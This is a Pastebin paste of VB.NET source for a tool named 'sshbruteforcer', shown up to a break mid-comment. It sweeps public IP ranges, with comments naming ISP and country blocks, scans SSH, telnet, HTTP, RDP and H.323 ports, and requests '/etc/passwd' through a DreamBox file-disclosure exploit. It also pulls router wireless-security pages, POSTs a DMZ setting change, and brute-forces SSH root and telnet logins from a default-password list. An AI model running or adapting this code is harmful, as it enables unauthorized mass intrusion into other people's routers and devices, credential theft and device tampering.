Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Imports System.Collections
- 'ArrayList
- Imports System.Collections.Generic
- Imports System.IO
- Imports System.Linq
- Imports System.Text
- Imports System.Threading
- Imports System.Net.Sockets
- Imports System.Net
- Imports Tamir.SharpSsh
- 'TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
- 'JA
- Namespace sshbruteforcer
- Public NotInheritable Class IPAddressMask
- Private Sub New()
- End Sub
- Private Shared Sub CheckIPVersion(ipAddress As IPAddress, mask As IPAddress, ByRef addressBytes As Byte(), ByRef maskBytes As Byte())
- If mask Is Nothing Then
- Throw New ArgumentException()
- End If
- addressBytes = ipAddress.GetAddressBytes()
- maskBytes = mask.GetAddressBytes()
- If addressBytes.Length <> maskBytes.Length Then
- Throw New ArgumentException("The address and mask don't use the same IP standard")
- End If
- End Sub
- <System.Runtime.CompilerServices.Extension> _
- Public Shared Function [And](ipAddress As IPAddress, mask As IPAddress) As IPAddress
- Dim addressBytes As Byte()
- Dim maskBytes As Byte()
- CheckIPVersion(ipAddress, mask, addressBytes, maskBytes)
- Dim resultBytes As Byte() = New Byte(addressBytes.Length - 1) {}
- For i As Integer = 0 To addressBytes.Length - 1
- resultBytes(i) = CByte(addressBytes(i) And maskBytes(i))
- Next
- Return New IPAddress(resultBytes)
- End Function
- Private Shared empty As IPAddress = IPAddress.Parse("0.0.0.0")
- Private Shared intranetMask1 As IPAddress = IPAddress.Parse("10.255.255.255")
- Private Shared intranetMask2 As IPAddress = IPAddress.Parse("172.16.0.0")
- Private Shared intranetMask3 As IPAddress = IPAddress.Parse("172.31.255.255")
- Private Shared intranetMask4 As IPAddress = IPAddress.Parse("192.168.255.255")
- ''' <summary>
- ''' Retuns true if the ip address is one of the following
- ''' IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
- ''' Start End
- ''' 10.0.0.0 10.255.255.255
- ''' 172.16.0.0 172.31.255.255
- ''' 192.168.0.0 192.168.255.255
- ''' </summary>
- ''' <returns></returns>
- <System.Runtime.CompilerServices.Extension> _
- Public Shared Function IsOnIntranet(ipAddress__1 As IPAddress) As Boolean
- If empty.Equals(ipAddress__1) Then
- Return False
- End If
- Dim onIntranet As Boolean = IPAddress.IsLoopback(ipAddress__1)
- onIntranet = onIntranet OrElse ipAddress__1.Equals(ipAddress__1.[And](intranetMask1))
- '10.255.255.255
- onIntranet = onIntranet OrElse ipAddress__1.Equals(ipAddress__1.[And](intranetMask4))
- '''/192.168.255.255
- onIntranet = onIntranet OrElse (intranetMask2.Equals(ipAddress__1.[And](intranetMask2)) AndAlso ipAddress__1.Equals(ipAddress__1.[And](intranetMask3)))
- Return onIntranet
- End Function
- End Class
- Public Class Program
- '(string ipaddress)
- ' public Socket Sock_scan;
- Shared m_byBuff As [Byte]() = New [Byte](32766) {}
- Private Max_thread As Integer = 50
- Private Shared callbackProc As AsyncCallback
- Private Shared m_ListOptions As New ArrayList()
- Shared IAC As [Char] = Convert.ToChar(255)
- Shared [DO] As [Char] = Convert.ToChar(253)
- Shared DONT As [Char] = Convert.ToChar(254)
- Shared WILL As [Char] = Convert.ToChar(251)
- Shared WONT As [Char] = Convert.ToChar(252)
- Shared SB As [Char] = Convert.ToChar(250)
- Shared SE As [Char] = Convert.ToChar(240)
- ' ManualResetEvent instances signal completion.
- Private Shared connectDone As New ManualResetEvent(False)
- Private Shared sendDone As New ManualResetEvent(False)
- Private Shared receiveDone As New ManualResetEvent(False)
- ' The response from the remote device.
- Private Shared response As [String] = [String].Empty
- Public Shared cpt_th As New Compteur_thread()
- Private ipaddress As String
- Private portx As Integer
- 'public static IPAddress address = IPAddress.Parse("10.20.10.5");
- 'bool onTheIntranet = address.IsOnIntranet();
- Public Sub New(ipaddress As String, portx As Integer)
- Me.ipaddress = ipaddress
- 'this.cpt_th = new Compteur_thread();
- Me.portx = portx
- End Sub
- Public Shared Sub Main(args As String())
- Dim p1 As New Program("go", 5)
- 'p1.go();
- Dim th_Scan_ip_port As New Thread(New ThreadStart(AddressOf p1.go))
- th_Scan_ip_port.Start()
- End Sub
- Public Sub go()
- ' CScanner_IP s;
- ' s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
- Dim t_IP_start As Byte()
- Dim t_IP_end As Byte()
- ' IPAddress MyExternalIp = GetExternalIp();
- ' Console.WriteLine("MyExternalIp=" + MyExternalIp);
- ' string[] s_ip = MyExternalIp.ToString().Split('.');
- ' string[] s2_ip = MyExternalIp.ToString().Split('.');
- Dim adresse_en_cours As String
- Dim Port_start As Integer = 22
- Dim Port_end As Integer = 23
- Dim th_Lance_Scan As Thread
- Dim th_Scan_ip_port As Thread
- AddHandler cpt_th.lancer_thread, New Program.Compteur_thread.Lancer_Thread(AddressOf Lancer_Thread)
- 'Decoupe IP debut
- '196.28.249.--- Burkina Faso
- '41.202.193.--- Cameroun
- '195.24.206.--- Cameroun
- '90.4.125.--- France
- '202.152.43.--- Indonésie
- '202.159.126.--- Indonésie
- 'http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
- '41.214
- Dim s_ip As String() = {"41", "141", "1", "1"}
- 'zawi 41.250.195.107
- 'string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
- 'string[] s_ip = { "81", "192", "102", "1" }; //Maroc telecom ip fixe 81.192.102.8: netpeas 81.192.152.205: cnia
- '41.248.0
- '41.248.158.92
- 'string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
- '41.141.55.16 Agadir
- '41.143.11.192
- '41.250.59.57
- '41.250.118.53
- '41.250.129.142
- 'string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
- ' string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
- '196.206.198.10 Rabat
- 'string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
- 'string[] s_ip = { "41", "250", "150", "18" };
- 'string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
- 'string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
- 'string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
- 'http://www.robtex.com/dns/adsl.iam.net.ma.html#records
- 'string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
- 'string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
- 'string[] s_ip = { "212", "217", "0", "1" }; //MENARA
- t_IP_start = New Byte(3) {}
- ' for (int i = 0; i < s_ip.Length; i++)
- ' t_IP_start[i] = Convert.ToByte(s_ip[i]);
- t_IP_start(0) = Convert.ToByte(s_ip(0))
- t_IP_start(1) = Convert.ToByte(s_ip(1))
- t_IP_start(2) = Convert.ToByte(s_ip(2))
- t_IP_start(3) = Convert.ToByte(s_ip(3))
- 't_IP_start[3] = Convert.ToByte("1");
- 'string[] s2_ip={"41", "250", "149", "254"}; //zawi
- ' string[] s2_ip={"41", "251", "254", "254"}; //zawi
- Dim s2_ip As String() = {"196", "12", "233", "255"}
- '196.12.232.120 <snip> location
- 'string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
- 'string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
- 'string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
- ' string[] s2_ip = { "41", "250", "150", "19" };
- 'string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
- 'string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
- 'string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
- t_IP_end = New Byte(3) {}
- ' for (int i = 0; i < s_ip.Length; i++)
- ' t_IP_end[i] = Convert.ToByte(s2_ip[i]);
- t_IP_end(0) = Convert.ToByte(s2_ip(0))
- t_IP_end(1) = Convert.ToByte(s2_ip(1))
- t_IP_end(2) = Convert.ToByte(s2_ip(2))
- t_IP_end(3) = Convert.ToByte(s2_ip(3))
- 't_IP_end[3] = Convert.ToByte("255");
- ' private void Lancer_Scan()
- ' {
- Dim i As Integer = 0, j As Integer = 0, k As Integer = 0, l As Integer = 0
- Dim max_j As Integer = 0, max_k As Integer = 0, max_l As Integer = 0
- Dim start_j As Boolean = True
- Dim start_k As Boolean = True
- Dim start_l As Boolean = True
- Try
- ' Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
- 'Console.WriteLine("Debut du scan");
- ' if(init_scan != null)init_scan(this, infs);
- For i = t_IP_start(0) To t_IP_end(0)
- If (start_j) AndAlso (t_IP_start(0) <> t_IP_end(0)) Then
- j = t_IP_start(1)
- max_j = 255
- End If
- If (start_j) AndAlso (t_IP_start(0) = t_IP_end(0)) Then
- j = t_IP_start(1)
- max_j = t_IP_end(1)
- End If
- If (Not start_j) AndAlso (i <> t_IP_end(0)) Then
- j = 0
- max_j = 255
- End If
- If (Not start_j) AndAlso (i = t_IP_end(0)) Then
- j = 0
- max_j = t_IP_end(1)
- End If
- While j <= max_j
- If (start_k) AndAlso (t_IP_start(1) <> t_IP_end(1)) Then
- k = t_IP_start(2)
- max_k = 255
- End If
- If (start_k) AndAlso (t_IP_start(1) = t_IP_end(1)) Then
- k = t_IP_start(2)
- max_k = t_IP_end(2)
- End If
- If (Not start_k) AndAlso (j <> t_IP_end(1)) Then
- k = 0
- max_k = 255
- End If
- If (Not start_k) AndAlso (j = t_IP_end(1)) Then
- k = 0
- max_k = t_IP_end(2)
- End If
- While k <= max_k
- If (start_l) AndAlso (t_IP_start(2) <> t_IP_end(2)) Then
- l = t_IP_start(3)
- max_l = 255
- End If
- If (start_l) AndAlso (t_IP_start(2) = t_IP_end(2)) Then
- l = t_IP_start(3)
- max_l = t_IP_end(3)
- End If
- If (Not start_l) AndAlso (k <> t_IP_end(2)) Then
- l = 0
- max_l = 255
- End If
- If (Not start_l) AndAlso (k = t_IP_end(2)) Then
- l = 0
- max_l = t_IP_end(3)
- End If
- While l <= max_l
- adresse_en_cours = i.ToString() & "." & j.ToString() & "." & k.ToString() & "." & l.ToString()
- ' Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
- ' Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
- ' if(debut_scan != null)
- ' debut_scan(this, info);
- '
- ' Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
- '
- Dim nb_thread As Integer = 0
- For port As Integer = Port_start To Port_end
- '
- ' Scanner_IP_Port(adresse_en_cours, port);
- ' th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
- ' th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
- ' th_Scan_ip_port.Start();
- '
- Dim sc As New Scanner_ip_port(adresse_en_cours, port, cpt_th)
- Dim t As New Thread(New ThreadStart(AddressOf sc.Scanner_IP_Port))
- t.Start()
- cpt_th.Incrementer()
- nb_thread = 0
- cpt_th.Nb_thread(nb_thread)
- If nb_thread = Me.Max_thread Then
- SyncLock Me
- ' Console.WriteLine("DEBUG WAIT1");
- Monitor.Wait(Me)
- End SyncLock
- End If
- Next
- 'http scan
- Dim sc2 As New Scanner_ip_port(adresse_en_cours, 80, cpt_th)
- Dim t2 As New Thread(New ThreadStart(AddressOf sc2.Scanner_IP_Port))
- t2.Start()
- cpt_th.Incrementer()
- nb_thread = 0
- cpt_th.Nb_thread(nb_thread)
- If nb_thread = Me.Max_thread Then
- SyncLock Me
- ' Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(Me)
- End SyncLock
- End If
- 'https scan
- Dim sc3 As New Scanner_ip_port(adresse_en_cours, 443, cpt_th)
- Dim t3 As New Thread(New ThreadStart(AddressOf sc3.Scanner_IP_Port))
- t3.Start()
- cpt_th.Incrementer()
- nb_thread = 0
- cpt_th.Nb_thread(nb_thread)
- If nb_thread = Me.Max_thread Then
- SyncLock Me
- 'Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(Me)
- End SyncLock
- End If
- 'VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
- Dim sc1720 As New Scanner_ip_port(adresse_en_cours, 1720, cpt_th)
- Dim t1720 As New Thread(New ThreadStart(AddressOf sc1720.Scanner_IP_Port))
- t1720.Start()
- cpt_th.Incrementer()
- nb_thread = 0
- cpt_th.Nb_thread(nb_thread)
- If nb_thread = Me.Max_thread Then
- SyncLock Me
- 'Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(Me)
- End SyncLock
- End If
- 'RDP scan
- Dim sc3389 As New Scanner_ip_port(adresse_en_cours, 3389, cpt_th)
- Dim t3389 As New Thread(New ThreadStart(AddressOf sc3389.Scanner_IP_Port))
- t3389.Start()
- cpt_th.Incrementer()
- nb_thread = 0
- cpt_th.Nb_thread(nb_thread)
- If nb_thread = Me.Max_thread Then
- SyncLock Me
- 'Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(Me)
- End SyncLock
- '
- ' sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
- ' th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
- ' th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
- ' th_Scan_ip_port.Start();
- '
- ' cpt_th.Incrementer();
- ' int nb_thread = 0;
- ' cpt_th.Nb_thread(out nb_thread);
- '
- '
- ' if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
- ' {
- ' Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
- ' if(this.maj_prg_bar != null)
- ' this.maj_prg_bar(this, ifs);
- '
- ' this.pas_a_atteindre += this.pas_progress;
- ' }
- '
- ' i_progress++;
- '
- '
- ' if(nb_thread == this.Max_thread)
- ' {
- ' lock(this)
- ' {
- ' Monitor.Wait(this);
- ' }
- '
- ' if(this.ARRETER_SCAN)
- ' {
- ' Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
- ' if(fin_scan != null)fin_scan(this, inf_s);
- '
- ' return;
- ' }
- ' }
- '
- End If
- l += 1
- End While
- start_l = False
- k += 1
- End While
- start_k = False
- j += 1
- End While
- start_j = False
- ' Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
- ' if(fin_scan != null)fin_scan(this, inf);
- Next
- Catch e As Exception
- Console.WriteLine("BADBOY: " & e.ToString())
- End Try
- ' }
- End Sub
- Public Class Scanner_ip_port
- Private adresse_ip As String
- Private port As Integer
- Private cpt_th As Compteur_thread
- Public Sub New(adresse_ip As String, port As Integer, cpt_th As Compteur_thread)
- Me.adresse_ip = adresse_ip
- Me.port = port
- Me.cpt_th = cpt_th
- End Sub
- Public Sub Scanner_IP_Port()
- Try
- ' Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
- Dim adresseIP As IPAddress = IPAddress.Parse(adresse_ip)
- Dim ip As New IPEndPoint(adresseIP, port)
- Dim Sock_scan As New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
- 'Sock_scan.Blocking = false;
- ' Connect to the remote endpoint.
- Sock_scan.Connect(ip)
- 'asynchronous
- ' try
- ' {
- ' Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
- ' }
- ' catch (Exception e)
- ' {
- ' Console.WriteLine("DEBUG BEGINCONNECT: "+e);
- ' }
- ' Console.WriteLine("DEBUG RACHEL");
- ' connectDone.WaitOne(1000);
- ' asynchronous
- ' Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
- Console.WriteLine("{0} -> Port {1} open", adresse_ip, port)
- ' if (scan_en_cours != null) scan_en_cours(this, info);
- '
- ' Byte[] RecvBytes = new Byte[256];
- ' String strRetPage = null;
- ' Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- ' Encoding ASCII = Encoding.ASCII;
- ' strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- '
- ' while (bytes > 0)
- ' {
- ' bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- ' strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
- ' }
- ' Console.WriteLine(strRetPage);
- '
- Dim data As Byte() = New Byte(4095) {}
- Dim banner As String
- Dim recv As Integer
- '
- ' NetworkStream ns = new NetworkStream(Sock_scan);
- ' if (ns.CanRead)
- ' {
- ' recv = ns.Read(data, 0, data.Length);
- ' stringData = Encoding.ASCII.GetString(data, 0, recv);
- ' Console.WriteLine("== BANNER START =======================");
- ' Console.WriteLine(stringData);
- ' Console.WriteLine("== BANNER END =======================");
- ' }
- ' else
- ' {
- ' Console.WriteLine("Error: Can't read from this socket");
- ' ns.Close();
- ' // server.Close();
- ' // return;
- ' }
- '
- ' Receive the response from the remote device.
- 'synchro
- recv = Sock_scan.Receive(data)
- banner = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0}:{1} -> BANNER01: " & banner, adresse_ip, port)
- If banner = "" Then
- recv = Sock_scan.Receive(data)
- banner = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0}:{1} -> BANNER02: " & banner, adresse_ip, port)
- End If
- 'synchro
- 'asynchro
- ' Receive(Sock_scan);
- ' receiveDone.WaitOne(1000);
- ' // Write the response to the console.
- ' Console.WriteLine("Response received : {0}", response);
- ' banner = response;
- ' asynchro
- If port = 21 Then
- ' ftptry(adresse_ip);
- Sock_scan.Close()
- End If
- If port = 22 Then
- ' sshtry(adresse_ip);
- Sock_scan.Close()
- End If
- If port = 23 Then
- If banner.Contains("ogin:") OrElse banner.Contains("assword:") OrElse banner.Contains("Connection was denied by remote host according to ACL!") Then
- Else
- recv = Sock_scan.Receive(data)
- banner = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0}:{1} -> BANNER03: " & banner, adresse_ip, port)
- If banner.Contains("ogin:") OrElse banner.Contains("assword:") Then
- Else
- recv = Sock_scan.Receive(data)
- banner = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0}:{1} -> BANNER04: " & banner, adresse_ip, port)
- End If
- End If
- Sock_scan.Close()
- If banner.Contains("Connection was denied by remote host according to ACL!") Then
- Else
- telnettry(adresse_ip, banner)
- End If
- End If
- If port = 80 Then
- Dim ResponseText As String = ""
- Dim SR As StreamReader = Nothing
- Dim response As HttpWebResponse = Nothing
- Dim request As HttpWebRequest
- request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/password.cgi"), HttpWebRequest)
- 'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET"
- 'request.ContentType = "application/xml";
- response = DirectCast(request.GetResponse(), HttpWebResponse)
- SR = New StreamReader(response.GetResponseStream())
- ResponseText = SR.ReadToEnd()
- Console.WriteLine(String.Format("password.cgi response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
- Console.WriteLine(String.Format("password.cgi response headers : [{0}]", response.Headers.ToString()))
- Console.WriteLine(String.Format("password.cgi response received : [{0}]", ResponseText))
- '***********************************************************************************************************************************************
- 'DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
- 'http://www.exploit-db.com/exploits/18079/
- request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/file?file=/etc/passwd"), HttpWebRequest)
- 'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET"
- 'request.ContentType = "application/xml";
- response = DirectCast(request.GetResponse(), HttpWebResponse)
- SR = New StreamReader(response.GetResponseStream())
- ResponseText = SR.ReadToEnd()
- Console.WriteLine(String.Format("DreamBox RFI response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
- Console.WriteLine(String.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()))
- Console.WriteLine(String.Format("DreamBox RFI response received : [{0}]", ResponseText))
- '***********************************************************************************************************************************************
- '108M Wireless ADSL2+ Router
- 'http://41.250.9.119/wlcfg.html //Wireless/Basic
- 'http://41.250.9.119/wlsecurity.html //Wireless/Security
- request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/wlcfg.html"), HttpWebRequest)
- 'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET"
- 'request.ContentType = "application/xml";
- response = DirectCast(request.GetResponse(), HttpWebResponse)
- SR = New StreamReader(response.GetResponseStream())
- ResponseText = SR.ReadToEnd()
- Console.WriteLine(String.Format("wlcfg.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
- Console.WriteLine(String.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()))
- Console.WriteLine(String.Format("wlcfg.html response received : [{0}]", ResponseText))
- '***********************************************************************************************************************************************
- request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/wlsecurity.html"), HttpWebRequest)
- 'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET"
- 'request.ContentType = "application/xml";
- response = DirectCast(request.GetResponse(), HttpWebResponse)
- SR = New StreamReader(response.GetResponseStream())
- ResponseText = SR.ReadToEnd()
- Console.WriteLine(String.Format("wlsecurity.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
- Console.WriteLine(String.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()))
- Console.WriteLine(String.Format("wlsecurity.html response received : [{0}]", ResponseText))
- '***********************************************************************************************************************************************
- 'http://41.250.9.119/scdmz.html //DMZ
- request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/scdmz.html?address=192.168.1.2"), HttpWebRequest)
- 'dmzAddr
- 'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "POST"
- 'request.ContentType = "application/xml";
- Dim postData As String = "address=192.168.1.2"
- Dim byteArray As Byte() = Encoding.UTF8.GetBytes(postData)
- request.ContentLength = byteArray.Length
- Dim dataStream As Stream = request.GetRequestStream()
- dataStream.Write(byteArray, 0, byteArray.Length)
- dataStream.Close()
- response = DirectCast(request.GetResponse(), HttpWebResponse)
- SR = New StreamReader(response.GetResponseStream())
- ResponseText = SR.ReadToEnd()
- Console.WriteLine(String.Format("scdmz.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
- Console.WriteLine(String.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()))
- Console.WriteLine(String.Format("scdmz.html response received : [{0}]", ResponseText))
- End If
- 'Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
- cpt_th.Decrementer()
- Catch e As Exception
- '
- ' Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
- ' if (scan_en_cours != null) scan_en_cours(this, info);
- '
- ' Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
- ' Console.WriteLine("EXCEPT: " + e);
- cpt_th.Decrementer()
- End Try
- End Sub
- End Class
- 'conexant telnet
- 'http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
- '123123
- Shared passwords As New List(Of String)() From { _
- "admin", _
- "1234", _
- "cisco", _
- "", _
- "Admin", _
- "root", _
- "toor", _
- "default", _
- "azerty", _
- "qwerty", _
- "12345", _
- "123456", _
- "1234567", _
- "12345678", _
- "dreambox", _
- "test", _
- "user", _
- "demo", _
- "ZXDSL", _
- "password", _
- "agadir", _
- "menara", _
- "Menara", _
- "maroc", _
- "vodafone", _
- "epicrouter", _
- "abc123", _
- "monkey", _
- "letmein", _
- "trustno1", _
- "dragon", _
- "baseball", _
- "111111", _
- "iloveyou", _
- "master", _
- "sunshine", _
- "ashley", _
- "bailey", _
- "passw0rd", _
- "shadow", _
- "123123", _
- "654321", _
- "superman", _
- "qazwsx", _
- "michael", _
- "football" _
- }
- Public Shared Sub sshtry(myip As String)
- Console.WriteLine("sshtry")
- ' sshtry("test");
- For Each password As String In passwords
- Try
- Console.Write("-Connecting...")
- Dim ssh As New SshStream(myip, "root", password)
- Console.WriteLine("{0} -> SSH PASSWORD IS: {1}" & vbLf, myip, password)
- Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac)
- Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion)
- Console.WriteLine("-Use the 'exit' command to disconnect.")
- Console.WriteLine()
- 'Sets the end of response character
- ssh.Prompt = "#"
- 'Remove terminal emulation characters
- ssh.RemoveTerminalEmulationCharacters = True
- 'Reads the initial response from the SSH stream
- ' Console.Write(ssh.ReadResponse());
- '''/Send commands from the user
- 'while (true)
- '{
- ' string command = Console.ReadLine();
- ' if (command.ToLower().Equals("exit"))
- ' break;
- ' //Write command to the SSH stream
- ' ssh.Write(command);
- ' //Read response from the SSH stream
- ' Console.Write(ssh.ReadResponse());
- '}
- ssh.Close()
- 'Close the connection
- Console.WriteLine("Connection closed.")
- Catch e As Exception
- Dim response As String = String.Empty
- response = e.Message
- If response = "Auth fail" Then
- ' sshtry("12345");
- Console.Write("{0} -> bad ssh password: {1}" & vbLf, myip, password)
- Else
- Console.WriteLine("{0} SSH ERROR -> " & e.Message, myip)
- End If
- End Try
- Next
- End Sub
- Public Shared Sub telnettry(myip As String, banner As String)
- Console.WriteLine("telnettry")
- Dim Sock_scan As Socket
- Dim data As Byte() = New Byte(1023) {}
- Dim stringdata As String = ""
- Dim recv As Integer
- 'try
- '{
- Dim adresseIP As IPAddress = IPAddress.Parse(myip)
- Dim ip As New IPEndPoint(adresseIP, 23)
- ' Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- 'Sock_scan.Blocking = false; // This is a non blocking IO
- '
- ' // Assign Callback function to read from Asyncronous Socket
- ' callbackProc = new AsyncCallback(ConnectCallback);
- ' // Begin Asyncronous Connection
- ' Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
- '
- ' Sock_scan.Connect(ip);
- 'recv = Sock_scan.Receive(data);
- 'Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
- '}
- 'catch (Exception eeeee)
- '{
- ' Console.WriteLine(eeeee.Message);
- '}
- Dim strRetPage As [String] = Nothing
- Dim bytes As Int32
- Dim RecvBytes As [Byte]() = New [Byte](255) {}
- Dim ASCII As Encoding = Encoding.ASCII
- '
- ' bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- '
- ' strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- '
- ' while (bytes > 0)
- ' {
- ' bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- ' strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- ' }
- ' Console.WriteLine("Banner telnet: " + strRetPage);
- '
- If banner.Contains("ogin:") OrElse banner.Contains("sername:") Then
- Sock_scan = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
- Sock_scan.Connect(ip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> BANNERLOGIN: " & stringdata, myip)
- '#Region "BANNERS01"
- 'Exemple: Vulcan
- '<BAD SEQUENCE>
- 'Copyright (c) 2001-2003 by Conexant, Inc.
- 'login: 01
- 'password:
- 'Echec Login
- 'login:
- 'login: 02
- 'password:
- 'Echec Login
- 'login: 03
- 'password:
- 'Echec Login
- 'login:
- 'login: 04
- 'password:
- 'Echec Login
- 'login: 05
- 'password:
- 'Echec Login
- 'Perte de la connexion à l'hôte.
- '</BAD SEQUENCE>
- '************************************************************************************
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- 'LOGON PASSWORD>
- '(epicrouter)
- '
- '
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' MAIN MENU
- ' 0. Select VC Adaptor
- ' 1. Display Firmware Version
- ' 2. Password Setup
- ' 3. Connection Status
- ' 4. Network Setup
- ' 5. ADSL Setup
- ' 6. System Maintenance
- ' S. Save Settings and Reset Unit
- ' R. Reset Without Saving Changes
- ' Q. Quit Session
- ' Enter your selection below:
- '>>>
- '(2)
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' Password Setup
- ' 1. Change Administrative Password
- ' 2. Change PPP User Name and Password
- ' 3. Change User Password
- ' Press 'B' to go Back
- ' Press 'M' to go to Main Menu
- ' Enter your selection below
- '>>>
- '(1)
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' Change Administrative Password
- ' Enter New Admin Password:
- ' (no less than 8 characters, '&' is not accepted)
- ' (Press ESC to quit)
- '>>>
- '
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' Confirm Administrative Password
- ' Re-enter New Admin Password:
- ' (no less than 8 characters, '&' is not accepted)
- ' (Press ESC to quit)
- '>>>
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' Password Setup
- ' 1. Change Administrative Password
- ' 2. Change PPP User Name and Password
- ' 3. Change User Password
- ' Press 'B' to go Back
